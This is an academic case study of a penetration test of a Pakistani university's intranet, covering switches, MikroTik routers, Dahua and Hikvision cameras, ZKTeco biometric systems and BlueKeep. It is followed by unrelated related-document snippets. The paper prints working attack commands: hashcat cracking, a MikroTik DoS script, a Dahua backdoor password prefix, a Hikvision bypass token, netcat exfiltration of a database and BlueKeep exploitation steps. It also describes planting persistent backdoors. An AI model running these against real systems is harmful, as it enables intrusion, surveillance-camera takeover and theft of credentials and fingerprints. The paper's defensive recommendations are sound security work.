Case Study: Intranet Penetration Testing of MUET

Size: px
Start display at page:

Download "Case Study: Intranet Penetration Testing of MUET"

Transcription

1 2 nd International Conference on Computational Sciences and Technologies, December 2020 (INCCST 20), MUET Jamshoro Case Study: Intranet Penetration Testing of MUET Shameel Syed Faheem Khuhawar Khizra Arain Talha Kaimkhani Zohaib Syed Hasan Sheikh Shahroz Khan Abstract Every organisation with its available resources requires its network to be secure from any sort of internal or external threats. This requires implementation and proper assessment of overall security measures. In this paper, we highlight how educational campus intra-network can be highly vulnerable due to improper configurations or inadequate security measures. Our investigation through penetration testing has allowed us to gain access of more than 50% of distribution and core switches from Cisco, IP cameras from Dahua and Hikvision, Bio-metric Systems from ZKTeco, MikroTik RouterOS, and PCs/Serves having vulnerabilities like BlueKeep. Systematic procedure is presented in this paper to perform the attacks along with the recommendations to implement proper security measures. Keywords Network Security; Penetration Testing; Testing; Exploitation; Attacks I. INTRODUCTION If vulnerability is utilized by an unauthorized individual to access a company s network, its resources can be compromised. The objective of a penetration test is to address vulnerabilities before they can be exploited. Penetration testing is a comprehensive method to test the complete, integrated, operational tests that consists of hardware, software and people. There are three main types of penetration testing namely, black hat penetration testing, white hat penetration testing and grey hat penetration testing. Black hat penetration testing scans the remote hosts for possible vulnerabilities with no prior knowledge of target, analyzes the vulnerabilities and their possible risk, and finally report them. White hat penetration testing is provided with a significant knowledge of the target. It is a simulation of an attack by a penetration tester who is having a detailed knowledge of the network environment. Grey hat penetration testing, also called gray box analysis, is a strategy in which the tester has limited knowledge of the internal details of the network. Gray hat approach is used when specifically, the threat of the attack is considered to be an inside job. We have used Grey Hat Approach in our research. Penetration testing has 4 steps to perform. Reconnaissance/ Information Gathering Scanning Exploitation Post exploitation Network scanning is a procedure for identifying devices on a network by employing features in the network protocol to signal devices and wait for a response. Most network scanning is used in monitoring and management, but scanning can also be used in identifying network elements or users for attacks. Exploitation is a piece of a software, a sequence of commands or a chunk of data that usually takes advantage of bug or vulnerability to cause unintended things or unintended behavior to occur on target machines. Such unintended behaviors include features like gaining control of a system, allowing privilege escalation or Denial of Services (DoS) attacks. Most devices connected to the Internet these days are not maintained and monitored properly. Instead, these are devices that are often not understood as computers but are termed as things, giving rise to the term, Internet of Things. II. Literature Review A penetration test is defined as a controlled attempt of penetrating into a network from outside in order to detect vulnerabilities [1]. In this age of continuously advancing technologies, every organization whether it be a university, a ISBN

2 hospital or military organization is network based. This makes work-related tasks more efficient and effective but also increases their risk of being targeted by a malicious threat either for any agenda or for personal gain. This is where penetration testing is important. Offensive security techniques are used in order to discover possible flaws in the network. For an IoT company, it can be said as an act of complimenting the defensive security measures before IoT motes are deployed [2]. It is a basic instinct of a security expert to think like a criminal in order to fill the gaps from criminals perspective. So, it is a basic necessity for the penetration tester to know as much as or more than what an attacker can know, in order to make the results meaningful [3]. Wireless connections are low cost and convenient for connecting network devices. The simplicity with which it gives connection is also a reason for attackers to target wireless network. Therefore, authentication protocols have been made for keeping unauthorized access out of the network. The two most commonly heard encryption schemes for wireless networks are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). The WEP algorithm was made to secure wireless internet connections in 1997, but it was vulnerable on many levels [4]. So WPA was developed as a second encryption standard which solved many problems lying in WEP. The latest version of WPA is WPA2. WPA2 provides stronger encryption than that of WPA rated standard [5]. Both gives the choice of two security modes, i.e., TKIS and AES encryption modes. WPA2-PSK protocol can be used in a wireless distribution system. For home users, WPA2PSK (AES Pre Shared Key) is used. The corporate security is based on 802.1X, the EAP authentication framework that uses a RADIUS, such as EAP-TLS, which provides a much stronger authentication system, and secure key distribution [6]. The greatest attack that engraved its name recently is WannaCry. WannaCry is a type of a ransomware; a ransomware is a type of malware that takes full control of the targeted system and demands ransom for the safe return of the functionality of the system. WannaCry is a software that make use of Eternal Blue and Double Pulsar. It started on May 12, Eternal Blue is a well-known vulnerability in the Server Message Block (SMB) protocol employed by Microsoft Windows operating the ports 445 and 139. Once the malware is injected in the machine, it searches for backdoor. WannaCry malware spread to over 300,000 systems in over 150 countries [7]. There was only one agenda of WannaCry, to collect ransom. It froze or completely locked down the target systems by placing an encryption and demanded about $300$600 to release the lock. CCTV cameras, that are the very eyes of an organization and keep security in check, can also be exploited. A cyber-attack on a Russian bank gave hackers access to 24,000 CCTV cameras in 30 different countries. This attack led the bank to lose more than 31 million USD. [8] Recently, a new vulnerability released in Microsoft s RDP service which is considered to be as dangerous as EternalBlue. This paper also illustrates the exploitation and safety measures of this vulnerability. According to the estimation provided by US Computer Emergency Response Team (Cert), almost 40 percent of IT security breaches are perpetrated by people inside the company. Additionally, FBI/CSI Risk Assessment implied that many enterprises ports are opened, and any laptop can plug into the network and gain access as a common practice. The total loss of the companies surveyed was approximately over 130 million USD with average expenditure per employee being about 241 million USD per year. 28 percent of the employees stated they had no idea if they were attacked and how many times they were attacked. Yet about 32 percent of employees said they were never attacked from the inside. This paper deals with the penetration test procedure for determining the security levels so as to highlight the possible vulnerabilities that could be exploited in the Campus Area Network (CAN) of Mehran University of Engineering and (MUET) including the IP cameras, Biometric systems, and switches deployed within the network. This paper explains various data link protocols that have been compromised during the research. Although, a lot of work has been done in the area of penetration testing, we have specifically followed standard penetration testing on the live network of Mehran University of Engineering and using Gray Hat approach. III. METHODOLOGY Network Penetration testing has following four steps. A. Reconnaissance Reconnaissance is the process of collecting information about the target without being discovered, and use that information to perform a detailed penetration test. Reconnaissance is the biggest phase any penetration tester goes through to identify devices on the network and their interconnection. Generic topology of campus area network is shown in Figure 1 that is gained through survey and later verified. Fig. 1: Network Diagram of Campus Area Network To gain basic information about DHCP, DNS and subnet IP address, following commands were used. 115

3 $ ifconfig It was found that subnet IP changed with the change of departments, i.e., every department at MUET has different subnet ID, and DHCP was part of it. Whereas, the local DNS information remained same. ICMP (ping) messages were sent from one department to another, as a result of which it was realized that tagged information was being sent along with a VLAN ID. Using this approach, information about VLANs of different departments were collected. Later, this information was verified after discovering misconfigured switches that allowed unauthenticated bypass, if first two or three sessions via telnet protocol are maintained beforehand, whereas fourth session allows an attacker to enter the switch without prompting for any password. username@hostname: $ telnet X.X This allowed Cisco IOS shell to be enabled, and eventually configuration file can be read, through which complete toplogy of MUET s network can be discovered, i.e., how core, aggregation, distribution, and access switches are interconnected with one another. Furthermore, additional information, such as rules of ACL and configuration of L2 protocols such as CDP, VTP, STP, and DTP, was also collected. B. Scanning The process of Scanning identifies security weaknesses in remote target network or local hosts. To achieve this, IP address information of live hosts and layer-2 devices was collected. Later, targeted hosts were scanned for open ports using a tool called nmap. username@hostname: $ nmap -T4 -A -v By this approach, tables of hosts with IP addresses and their corresponding MAC addresses along with open ports were made. Due to VLANs restriction, initially, the scan was being done on each VLAN separately. Later on, after the exploitation of core switch, detailed information was retrieved quickly and without any exhaustion. C. Exploitation 1) Switches: The switches with open Telnet ports were targeted, after a care-full review of scanning results. Upon attempting to access switches, it was discovered that more than 50% switches used default credentials, irrespective of their vendors. Switches that had their default passwords changed, were misconfigured, such as using vty 0 4, allowing accessing to switch after 5 simultaneous virtual connection sessions. Figure 2 shows snapshot of accessing the core switch. Fig. 2: Accessing Core Switch It was discovered that Cisco IOS Shell was enabled, through which configuration files of all of the core switches could be copied. From these configuration files, intensive information that helped in exploiting various L2 protocols was gathered. Hash password of users having privilege level of 15 and password to enter global configuration mode of the switch can also be retrieved from the configuration file which was later on cracked with the help of hashcat 1. This paper demonstrates the use of hashcat from Windows OS. Assuming that hashcat is installed in C drive, following command was used to brute-force the password, while assuming that the password consisted of 6 characters, where crack.txt is the name of the files which stores hashes of Cisco Type 5. The output of hashcat is shown in Figure 3. C:\hashcat>hashcat64.exe -a 3 -m 500 crack.txt?a?a?a?a?a?a Switches with Cisco IOS are by default allowed to write data into flash storage, this was further exploited to write malicious code and somehow trigger it to spread the malware throughout the network. Figure 4 demonstrate the proof of writing and adding a text file into the core switch. All of the files in flash storage of the switch can be seen and the configuration file can be read using cat command. Fig. 3: Hashcat Fig. 4: Writing data into the flash storage of core switch Linksys switches have been exploited through a vulnerability, called The Moon. This vulnerability can be exploited through Metasploit or Routersploit. Figure 5 demonstrates how it is done. 1 The tool hashcat needs to be installed first on the PC (Linux or Windows). 116

4 Fig. 5: Exploitation of Linksys switches Remote network connection is a basic necessity for the management of enterprise networking devices. Accessing routers and switches on daily basis for tasks such as, creating and removing VLANs, adding or removing interfaces. The access to the router/switch is done via either Telnet or Secure Shell (SSH). Using Telnet is rather common even if it is an insecure way. It is highly recommended that SSH be used instead of Telnet. 2) Routers: It was discovered that the currently deployed router on the campus was running MikroTik Router OS An easier approach was carried out in which a preinstalled tool called searchsploit was utilized in order to find the vulnerabilities of the vendor MikroTik. Figure 6 shows that MikroTik RouterOS v is vulnerable for the following defined version. To exploit, following command was used. cat /usr/share/exploitdb/exploits/hardware/remote/46444.txt Furthermore, DoS attack defined in the exploits as searched by Searchsploit can be performed on MikroTik RouterOS using following command. python /usr/share/exploitdb/exploits/hardware/dos/18817.py X.X config 9 3) IP Cameras: Organizations pay no attention to security vulnerabilities before purchasing and deploying CCTV cameras. Our investigation led us to exploit IP cameras from different vendors, most of the vulnerabilities of these devices Fig. 6: Searching Exploits by Searchsploit are well documented, yet they were still not patched. We demonstrate how easy it was to gain access into the CCTV system using brute-force attack via a tool called Hydra. Figure 7 demonstrates how Hydra is used. Fig. 7: Dictionary Attack on IP Cameras From those IP Cameras, database was extracted but the passwords were encrypted using the proprietary algorithm of the company. Hash passwords were extracted from the database and those hashes were put to access cameras from Hikvision. This allowed access to camera directly, suggesting poor implementation from Hikvision and a vulnerability of these cameras. Another downside of using IP cameras on intranet is that the passwords have to be hashed offline, which means that the algorithm must be somewhere in the system. After exploring the camera, algorithm was found to be in sofia.py. Figure 8 demonstrates how this algorithm converts to hash. Fig. 8: Hashing Algorithm Afterwards, a script was written to perform brute-force attack to find the passwords of the registered users and thus access was gained on different cameras which were not accessible via Telnet. It was found out that Hikvision and Dahua use the same algorithm to convert plain-text into hash. The database from some of the cameras was compromised due to the existence of backdoor in the camera using these different links on different cameras: After Dahua noticed that hackers have been accessing cameras by default usernames and passwords, they gave a patch that disabled the telnet access. However, disabling the remote access turned out to be a much bigger obstacle for users to access IP cameras than it was thought, because in case usernames and passwords were forgotten, there was no way to access the cameras. To cope with that situation, Dahua gave a script to access cameras through telnet. setconfig&telnet.enable=true After entering the script, a username and password is asked. But before the password, a string 7ujMko0 had to be added. For example, if username and password is admin, so password has to be provided like: 7ujMko0admin. Recovered passwords retrieved from previous methods were utilized with this string, and it also let default credentials open the telnet door of various cameras. In some cameras of Hikvision, entering following script into the browser allows an attacker to bypass authentication

5 Worst part is that, by using this method, configuration file of Hikvision cameras can also be downloaded. YWRtaW46MTEK This configuration file contains usernames and passwords (in plain-text) for all configured users. Files are encrypted but encryption is easily reversible because of the presence of a static encryption key which is derived from the password abcdefg. Above script allows the attacker to take a snapshot from the IP camera as it can be seen in Figure 9. Fig. 10: Software based on this vulnerability Fig. 9: Snapshot Taken by Entering Script This vulnerability also allows an attacker to change the password of the IP cameras of Hikvision very easily as it can be demonstrated in Figure 10. There is a protocol, Onvif, which was enabled on majority of the cameras and it was left unprotected due to the lack of knowledge of this protocol. Through this protocol, the use of the URL in a software like VLC Media Player allows access to the IP Cameras using default credentials. rtsp://<ip>:<port>/cam/realmonitor?channel=1&subtype=0& unicast=true&proto=onvif Onvif Device Manager can be used to manage the cameras in which this protocol is enabled. This allow to add/delete users, change the movement of the camera, speak into the camera, changing DNS server, changing NTP server and other features as well. The snapshot of using Onvif to access IP cameras is shown in Figure 11. Fig. 11: Accessing cameras using ONVIF 4) Bio-metric Systems: Bio-metric fingerprint systems are used throughout the campus for the purpose of attendance of faculty members in the campus, and in some organizations, biometric systems are used as locks for doors. Penetration testing is done on two models of ZKTeco, uface800/id and iclock880-h/id. Linux Kernel embedded in these systems are ZM220, ZEM600 and ZEM800. Telnet door was enabled on these machines and default passwords were not changed due to which access was gained into the systems after performing brute-forcing with the use of probable wordlists. Figure 12 demonstrates accessing IP camera via telnet. Fig. 12: Accessing biometic via Telnet First, database file were searched using the following command. find -name *.db 118

6 It will search all the files in the system having extension.db, which denotes a database file. After navigating to that directory, a database file was transferred using a tool netcat. The command from sending side (ZEM220) was, nc < ZKDB.db is the IP of the PC where file was required to be received but port 9999 had to be open on the PC that received the transferred file using the following command on the PC. nc -l -p 9999 > ZKDB Where, -l denotes that the port 9999 is opened to listen from the remote connection. sqlite or any other software can be used to view the transferred file. After making changes, the.db file was uploaded to system the same way it was downloaded, using the tool netcat. UDP Port 4370 of ZK5000-ZK9000 allows anyone to connect to the system without any proper authentication. Custom commands can be created and sent to the device through UDP port 4370 to download information. This can be confirmed using the tool called Scapy from Linux OS. Alternatively, proprietary software of this company is also available which uses this port to connect to the device without password. Although other versions of this software can be used to exploit this vulnerability, but this has been confirmed by employing the software ZKTeco 5.0 as shown in Figure 13. Fig. 13: Snapshot of ZKTeco 5.0 This shows that one device has been connected, without providing any password. Following actions can be performed with this software; 1) Add a user 2) Delete a user 3) Change privileges of users 4) Modify Attendance Logsheet, i.e., change time and nature of attendance This database can be decrypted to extract the fingerprints of the users registered in the device these extracted fingerprints then can be used against the user in various ways, i.e., impersonation, identity theft, etc. 5) Exploiting Vulnerabilities in an Operating System: In different networks of different organizations, there is a plethora of vulnerabilities to exploit varying in accordance to the users. Different vulnerabilities were discovered in scanning phase which have been exploited to gain access in various systems. One of the most common vulnerability to access the system is Eternal Blue which could be exploited easily through Metasploit framework. This paper focuses on following two vulnerabilities. Firstly, this paper demonstrate the exploitation of an old bug that has been present in Netatalk for a long time. Pea is a proof of concept which bypasses authentication to gain control of execution flow of Netatalk as shown in Figure 14. This vulnerability has been patched in Further details of this explanation can be found on the website of NIST by searching for CVE Fig. 14: Exploitation of Netatalk Secondly, this paper explains the exploitation of a vulnerability which is a hot topic these days. Bluekeep (CVE ) is a recently found vulnerability that has been discovered in RDP service of Microsoft. This is a wormable vulnerability which can be considered as dangerous as EternalBlue. After being exploited, this vulnerability provides an attacker with complete access on host s system. From scanning phase, information was gathered to know which hosts are using RDP Service of Microsoft. Following text demonstrates further scanning it with the module of Metasploit, to evaluate how many of the hosts are vulnerable to Bluekeep vulnerability. msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS RHOSTS => msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run [*] : The target is not exploitable. [*] : The target is not exploitable. [*] Scanned 2 of 18 hosts (11% complete) [+] : The target is vulnerable. [*] : The target is not exploitable. [*] Scanned 4 of 18 hosts (22% complete) [+] : The target is vulnerable.... Since metasploit recently launched the module for exploiting Bluekeep, the module had to be manually added. wget edb7e20221e d1f61132db3a56f81b8ce9/modules/ exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploitframework/modules/exploits/windows/rdp/ After that, open metasploit and run the following command, reload_all 119

7 set RHOST target and launch the attack. After the attack was done, a meterpreter shell was provided through which complete access over victim s PC was gained as it can be seen in Figure 15. Fig. 15: Exploiting Bluekeep Other than exploiting devices as a whole, this work also focuses on exploiting protocols of data-link layer in TCP/IP suite. The main purpose to build TCP/IP suite was to ensure that different layers work without the knowledge of each other. But unfortunately, this means that if any one layer of TCP/IP suite is attacked, other layers will not get any idea of the problem. In networking, layer-2 is a very weak link and prone to attacks. Following layer-2 protocols have been compromised namely, ARP, VTP, STP, and DTP. 6) ARP Spoofing: ARP is used to discover MAC address associated with given IP address. A client can send an unsolicited reply which is called a gratuitous ARP, and other hosts can save that information in their ARP tables in the same subnet. This way, anyone can claim to have any IP/MAC address. This is how ARP attacks redirect traffic. There are certain countermeasures to ARP spoofing attacks, such as using DHCP snooping binding table, in which it is necessary for all ARP packets to match the binding table entries or else the ARP packets will be discarded. This is done when dynamic ARP inspection is enabled. In the network under consideration, DHCP Snooping is enabled but there is a Proxy Server deployed in the network which authenticates each time a request is sent. Since the Proxy server is using HTTP protocol, then by poisoning the whole VLAN, usernames and passwords of clients can be retrieved. MITMF v0.9.8 tool is used to demonstrate the procedure as shown in Figure 16. The example demonstrates ARP poison by setting gateway address and target range. Fig. 16: ARP Spoofing using MITMF 7) DTP Attack: On a switch, a port is configured in two ways. Either as an access port or as a dynamic port. When a host is connected to a switch, an access port is used. With VLAN implementation, each access port is assigned to only one VLAN. On the contrary, a trunk port allows the traffic of multiple VLANs to pass through. A trunk port can be configured via a Cisco propriety protocol called Dynamic Trunking Protocol (DTP). DTP automates the IEEE 802.1x/ISL Trunk configuration. It does not operate on routers. Synchronization of trunking mode on end links is done by the DTP. DTP state on trunking port can be set to Auto, On, Off, Desirable, or Non-Negotiate. In switch spoofing attack, the attacker impersonates as a switch in order to trick a legitimate switch into creating a trunking link between them. As already mentioned, any VLAN s packets are allowed to pass through the trunking link. Upon establishment of the link, traffic from any VLAN can be accessed by an attacker. The chance of success of this exploit depends solely on the fact that the legitimate switch is configured as Dynamic Desirable, Dynamic Auto or Trunk mode. Since the switches under consideration were configured as Auto, so a switch spoofing attack was performed using the tool Yersinia v0.8.2 as shown in Figure 17, and thus a trunk link was formed. Fig. 17: DTP attack using Yersinia It can be clearly seen that, access port was assigned and then it turned into trunk link after a successful DTP attack. This attack also provides a way for VLAN hopping attack / double Encapsulation attack. This attack can be prevented by manually assigning each port as an access or trunk port. Further security 120

8 measures include using a different VLAN other than default VLAN as a Native VLAN. 8) VTP Attack: Switches are added to a VTP domain for them to use VTP. This VTP domain is defined in a VTP server, and later clients and transparent devices as well. Whenever a new VLAN is added/created in a VTP server, the VTP server will automatically distribute this information among all the switches present in the VTP domain. All the switches (except the VTP server) are defined as client switches, and their task is to listen to the changes regarding VLANs by the VTP server. Switches that are configured transparent, without altering their VLAN assignments, will simply forward the VTP information. This is really useful when there are a lot of switches involved in the network. Since all VLAN information can simply be altered from any place and automatically be changed due to VTP server. On the other hand, some risks are involved that an attacker could exploit that usefulness by creating a rogue VTP server and gain complete control over the VTP domain VLANs. To remedy that, VTP implements MD5-based authentication in the VTP frames. In MD5 authentication, VTP server has a password for authenticating the VTP domain switches, without that password switches will not authenticate VTP information. Password is sent in MD5 hash. This hash is then verified and used by the client switch. There are mainly two facts to consider when injecting VTP frames. The port should be turned into a trunk by the attacker (via DTP attack), and the VTP configuration revision number should be higher than the previous advertisements of VTP for recent update reflection. By adding or deleting the VLANs via a rogue VTP server, a VTP attack is done. when there is a need to make changes. Other switches are secondary by default which secures the network from this attack. 9) CDP Attack: The Cisco Discovery Protocol (CDP) is another propriety protocol of Cisco used by all devices by default. Directly connected devices are discovered using CDP, to simplify their configuration and connectivity. There is no maintained encryption in CDP messages. Information of CDP is broadcasted periodically, updating each device s CDP database. Routers cannot propagate it because CDP is a layer 2 protocol. Information of network devices such as software version, IP address, capabilities, platform, interfaces and the native VLAN information are gathered up in CDP. Ultimately, whole network s topology could be determined using CDP and if it gets into an attacker s hand, this information could be used to exploit the network in many ways, mainly in the form of a Denial of Service (DoS) attack. Attacker can get CDP information via Wireshark or other network analyzer tool to sniff out the broadcast messages sent by the CDP. For example, if attacker gets to know the Cisco IOS version of the device as shown in Figure 19. This information is enough to search for exploits in that particular version. The attacker can also send malicious or bogus CDP packets to the directly connected Cisco devices, which can cause the switch to utilize its CPU to a maximum of 100%. CDP is a useful protocol when documentation of a network is being made and in most cases CDP is enabled on every switch and port in the network. Fig. 19: CDP Fig. 18: VTP Information A rogue VTP server can be made on any switch by increasing the revision number from the previous one (previous revision number was known by viewing VTP information in core switch as shown in Figure 18), after sending the command to change VLAN configurations via rogue VTP server, the MD5 hash was sent with that frame and there were no qualms in accepting that malicious frame since the hash was authenticated. This was done using the tool Yersinia. It is important to know that exploitation of MD5 hash was possible because switches were configured with VTP Version 2. The remedy of that is to implement VTP Version 3. VTPv3 uses status made up of primary and secondary VTP servers. Primary status is used only 10) STP Attack: Spanning Tree Protocol (STP) is used to avert the loops being formed on layer-2 switches or bridges network with multiple paths for redundancy reason. Switches are made aware of each other and the bandwidths of links being used between them. The switches can then select a path that is both loop-free and with maximum possible bandwidth in the network. The decision of choosing the link is based on STP path cost. There is a reference point to control the STP called Root Bridge. The root of STP is selected from the switches via Election Process. All the traffic goes through root bridge. Subsequent to the election of root bridge, a root port is elected that has the shortest STP path cost to the root bridge. After that, designated ports for each segment of network are selected. All the STP attacks differ based on the modification of one or more fields of BPDU frames. After sniffing existing legitimate BPDUs and taking their settings into account, the most dangerous attack type would be presenting a machine under 121

9 your control as the Root Bridge, so that all the traffic in the STP topology should go through the attacker. STP BPDUs should not propagate through access ports, but such BPDUs were accepted due to misconfiguration. Knowing the bridge priority from the reconnaissance phase (via core switch), bridge priority of a switch chosen from the network was changed to be lower than the root switch, thus making that switch the root bridge which enabled the whole data to be sniffed. Above mentioned attack (called root role attack) can be thwarted by Root Guard and BPDU-guard, which were not enabled here. Secondly, STP DoS attack was also performed by sending thousands of packets per second with the help of Yersinia. The switch processed so many config BPDU packets which kept on constantly changing the root bridge within the STP topology, rendering STP confused. Thirdly, another DoS attack was performed in which TCN BPDUs were sent to the root bridge which caused the STP topology to change continuously. BPDU filtering can be used to mitigate both above mentioned DoS attacks. 11) DHCP Starvation: DHCP protocol is an integral component, the function of which is the configuration of client machines with IP addresses and other information such as subnet mask, DNS address and default gateway. DHCP starvation is an attack that targets DHCP servers in which malicious DHCP requests are made to exhaust the IP pool of all the available IP addresses. As a result, proper network users get DoS. DHCP Starvation can be launched even with a minimal bandwidth [9]. In our attack, it can be seen in Figure 20, DHCP Release Message is sent as broadcast in the VLAN to release IP addresses of the users, followed by immediately sending DHCP Request Message to completely exhaust the IP pool of the DHCP server. Fig. 20: DHCP Attack Afterwards, DHCP Rogue Server can be created to assign IP addresses through our system and then perform ManIn-The- Middle attack on the victims who have obtained IP addresses through rogue DHCP. D. Post Exploitation The purpose of this phase is to create a alternate way to get into the system so that the accessibility to compromised systems remain intact. For that, backdoors were created and then deployed on compromised IP Cameras and Biometric systems. In bio-metric systems, persistent backdoor was created via netcat tool. However, different vendors of IP Cameras (or even some bio-metric systems) do not support netcat tool, so in order to create persistent backdoors in such systems, tools like ShellPop or TheFatRat can be used. IV. CONCLUSION Securing the network of an organization requires penetration testing. This helps to identify vulnerabilities which can be exploited for malicious intentions. Network administrator should be aware of the security aspect of different protocol configurations on networking device. This awareness helps employees to avoid internal, external, and social engineering attacks on network. Moreover, a well thought out security policy which lines in with the organization s need is rather a very important factor when deploying a network. The following step must be taken to mitigate the threats as outlined in this research paper. (1) Change the default credentials of all the protocols configured in a network. And for the devices which allow unauthenticated access shouldn t be allowed remote access. Alternatively, a restricted access should be allowed to authorized users by deploying specific security policies. (2) Configure port security to prevent DHCP starvation attack. (3) Enable DHCP snooping feature will prevent Rogue DHCP Server attacks. (4) ARP attacks can be prevented by Dynamic ARP Inspection (DAI). (5) IP/MAC spoofing can be prevented using IP source guard (IPSG) feature. (6) SSH should be used instead of Telnet to configure network devices remotely as Telnet establishes a session where information flows in plain text which can be easily sniffed via Wireshark or any other sniffing tool. (7) Passwords must be set for all VTY sessions and not just for the first three or four sessions otherwise attacker can exploit this to attack a network. (8) Port security should be enabled on all the active interfaces (access port) of switch and all unused port should be shut down to avoid unauthorized access. (9) IDS or ARP inspection prevents ARP attack. (10) For prevention of attacks related to STP, BPDU-guard and Root-guard feature should be enabled. (11) Use VTP version 3 to fend off against VTP attacks. (12) Use CDP only when it is necessary. REFERENCES [1] S. Turpe and Jrn Eichler. Testing production systems safely: Common precautions in penetration testing. pages , [2] Chung-Kuan Chen, Zhi-Kai Zhang, Shan-Hsin Lee, and Shiuhpyng Shieh. Penetration testing in the iot age. Computer, 51:82 85, [3] Bishop Matt. About penetration testing. IEEE Security and Privacy, 5(6):84 87, [4] Erik Tews and Martin Beck. Practical attacks against wep and wpa. In Proceedings of the second ACM conference on Wireless network security, 122

10 pages ACM, last accessed on [5] Joseph Mwangi, Dr. Wilson Cheruiyo, and Dr. Michael Kimwel. Security analysis of wpa2. Control Theory and Informatics, 5, semanticscholar.org/bbd9/af99e0ff0a1df675d4dbac81b8d pdf, last accessed on [6] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and Behrang Samadi. A survey on wireless security protocols (wep, wpa and wpa2/ i). In nd IEEE International Conference on Computer Science and Information, pages IEEE, https: //ieeexplore.ieee.org/abstract/document/ , last accessed on [7] Ashok Koujalagi, Shweta Patil, and Praveen Akkimaradi. The wannacry ransomeware, a mega cyber attack and their consequences on the modern india. International Journal of Information, 6(4):1 4, apr [8] Mohammed Farook Bin Rafiuddin, Prethpal Singh Dhubb, and Hamza Minhas. Recent study of close circuit television (cctv) in hacking. International Journal of Advance Research in Science and Engineering, 6(4): , apr [9] N. Tripathi and N. Hubballi. Exploiting dhcp server-side ip address conflict detection: A dhcp starvation attack. In 2015 IEEE International Conference on Advanced Networks and Telecommuncations Systems (ANTS), pages 1 3, Dec

Securing end devices

Securing end devices Securing end devices Securing the network edge is already covered. Infrastructure devices in the LAN Workstations Servers IP phones Access points Storage area networking (SAN) devices. Endpoint Security

More information

The Trivial Cisco IP Phones Compromise

The Trivial Cisco IP Phones Compromise Security analysis of the implications of deploying Cisco Systems SIP-based IP Phones model 7960 Ofir Arkin Founder The Sys-Security Group [email protected] http://www.sys-security.com September 2002

More information

Penetration Testing Report Client: Business Solutions June 15 th 2015

Penetration Testing Report Client: Business Solutions June 15 th 2015 Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]

More information

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting

https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests

More information

Vulnerability Assessment and Penetration Testing

Vulnerability Assessment and Penetration Testing Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration

More information

Tools for Attacking Layer 2 Network Infrastructure

Tools for Attacking Layer 2 Network Infrastructure Tools for Attacking Layer 2 Network Infrastructure Kai-Hau Yeung, Dereck Fung, and Kin-Yeung Wong Abstract Data Link layer is considered as the weakest link in a secured network. If an initial attack comes

More information

Penetration Testing with Kali Linux

Penetration Testing with Kali Linux Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or

More information

Wireless Security: Secure and Public Networks Kory Kirk

Wireless Security: Secure and Public Networks Kory Kirk Wireless Security: Secure and Public Networks Kory Kirk Villanova University Computer Science [email protected] www.korykirk.com/ Abstract Due to the increasing amount of wireless access points that

More information

1. LAB SNIFFING LAB ID: 10

1. LAB SNIFFING LAB ID: 10 H E R A LAB ID: 10 SNIFFING Sniffing in a switched network ARP Poisoning Analyzing a network traffic Extracting files from a network trace Stealing credentials Mapping/exploring network resources 1. LAB

More information

CCT vs. CCENT Skill Set Comparison

CCT vs. CCENT Skill Set Comparison Operation of IP Data Networks Recognize the purpose and functions of various network devices such as Routers, Switches, Bridges and Hubs Select the components required to meet a given network specification

More information

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks

More information

642 552 Securing Cisco Network Devices (SND)

642 552 Securing Cisco Network Devices (SND) 642 552 Securing Cisco Network Devices (SND) Course Number: 642 552 Length: 1 Day(s) Course Overview This course is part of the training for the Cisco Certified Security Professional, Cisco Firewall Specialist,

More information

Topics in Network Security

Topics in Network Security Topics in Network Security Jem Berkes MASc. ECE, University of Waterloo B.Sc. ECE, University of Manitoba www.berkes.ca February, 2009 Ver. 2 In this presentation Wi-Fi security (802.11) Protecting insecure

More information

Who is Watching You? Video Conferencing Security

Who is Watching You? Video Conferencing Security Who is Watching You? Video Conferencing Security Navid Jam Member of Technical Staff March 1, 2007 SAND# 2007-1115C Computer and Network Security Security Systems and Technology Video Conference and Collaborative

More information

WiFi Security Assessments

WiFi Security Assessments WiFi Security Assessments Robert Dooling Dooling Information Security Defenders (DISD) December, 2009 This work is licensed under a Creative Commons Attribution 3.0 Unported License. Table of Contents

More information

WIRELESS SECURITY. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

WIRELESS SECURITY. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006 WIRELESS SECURITY Information Security in Systems & Networks Public Development Program Sanjay Goel University at Albany, SUNY Fall 2006 1 Wireless LAN Security Learning Objectives Students should be able

More information

How To Classify A Dnet Attack

How To Classify A Dnet Attack Analysis of Computer Network Attacks Nenad Stojanovski 1, Marjan Gusev 2 1 Bul. AVNOJ 88-1/6, 1000 Skopje, Macedonia [email protected] 2 Faculty of Natural Sciences and Mathematics, Ss. Cyril

More information

Building Secure Network Infrastructure For LANs

Building Secure Network Infrastructure For LANs Building Secure Network Infrastructure For LANs Yeung, K., Hau; and Leung, T., Chuen Abstract This paper discusses the building of secure network infrastructure for local area networks. It first gives

More information

Exploiting Transparent User Identification Systems

Exploiting Transparent User Identification Systems Exploiting Transparent User Identification Systems Wayne Murphy Benjamin Burns Version 1.0a 1 CONTENTS 1.0 Introduction... 3 1.1 Project Objectives... 3 2.0 Brief Summary of Findings... 4 3.0 Background

More information

Sitefinity Security and Best Practices

